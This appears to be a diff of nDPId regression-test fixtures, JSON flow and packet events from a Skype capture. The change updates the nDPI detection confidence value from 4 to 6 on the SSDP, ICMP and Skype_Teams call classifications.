-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1431970685835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgeC8AAAERj1nAqAEi7\/\/\/+udlB2wAjLHaTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1431970685835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChI3QAAAER5BPAqAEi7\/\/\/+uLNB2wAjVB\/TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1431970685835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgWWQAAAERriTAqAEi7\/\/\/+uLNB2wAjLZyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1320,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1431970685835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970685835,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo7Q4AAEARCkPAqAEiwKgBAeasFOcAFAzzAAEAADLdMt0AAA4Q"} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1431970685839,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970685839,"pkt":"PBXCt3IO0NQSxnP1CABFwABElr0AAEABX8jAqAEBwKgBIgMDgJYAAAAARQAAKO0OAABAEQpDwKgBIsCoAQHmrBTnABQM8wABAAAy3TLdAAAOEA=="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.991447} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.991447} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685852,"flow_last_seen":1431970685852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970685852,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431970685852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970685852,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXIlAAEAG5ijAqAEiW77afchUMD4lFgKCAAAAALAC\/\/+SwgAAAgQFtAEDAwUBAQgKPjJN1wAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431970685921,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970685921,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0NCRAAPQGWplbvtp9wKgBIjA+yFR61rIKJRYCg4ASH\/4KBwAAAgQFoAEDAwQBAQQC"} 
@@ -806,16 +806,16 @@ 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1431970686906,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686906,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoj59AAEAGsyrAqAEiW77afchWAbv9gi8CpBfd4VAQIAAfPgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1431970687261,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687261,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuS7AAAEAREzPAqAEirjGr4DLdfQsAGuTOfB8CfeyODsgiOuU1SIeok9yn"} 
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1384,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687261,"flow_last_seen":1431970687261,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687261,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAurJcAAEARrJHAqAEiUx8MrTLdXYMAGpfYfCECZ7K5p+bX8n+OJOOTrcyv"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1385,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuSakAAEAREGnAqAEivYqhWDLdTEEAGhcdfCMC1zNoLOVTJhFFmEsFrmck"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1431970687262,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970687262,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuOf4AAEAROozAqAEivbyGrjLdV6QAGoKkfCUCWKDpreHeWqMtL4LNh6CD"} 
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1387,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970687262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1431970687670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970687670,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjTxAAEAG\/gPAqAEiTKehBshYTzLHdCWnAAAAALAC\/\/\/vzwAAAgQFtAEDAwUBAQgKPjJU3AAAAAAEAgAA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970687670,"flow_last_seen":1431970687670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970687670,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -830,10 +830,10 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1431970687953,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970687953,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06CNAAEAGoyjAqAEiTKehBshYTzLHdCWoEv4emIAQECx16wAAAQEICj4yVfS+r7gZ"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1431970688025,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970688025,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuOK8AAEARxlrAqAEib91KDjLdAbsAGqZSfFUC4vleo7UvMvPmsU4YCKBd"} 
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688025,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970688320,"flow_last_seen":1431970688320,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970688320,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.141","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1431970688320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970688320,"pkt":"0NQSxnP1PBXCt3IOCABFAAAukPgAAEARnzfAqAEinTfrjTLdAbsAGuidfHYCyiJR+IygHiSHdyp3P0rG"} 